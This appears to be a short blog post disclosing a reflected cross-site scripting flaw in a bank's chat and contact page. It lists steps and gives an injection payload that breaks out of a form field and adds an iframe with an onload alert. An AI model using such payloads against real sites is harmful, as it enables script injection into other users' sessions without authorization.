Application
- TDBank chat web page
Information
- Input not validated
- Reflect Cross Site Scripting flaw
Exploit
XSS #1
1. Browse to Online Store
1. Browse to Personal Banking -> Contact Us
2. Select Pages -> Have General Question -> Ask now
3. Paste Payload -> TD Bank SWIFT/BIC code"><iframe width="1000px" height="450px" src="" onload=alert('XSS')>
No comments:
Post a Comment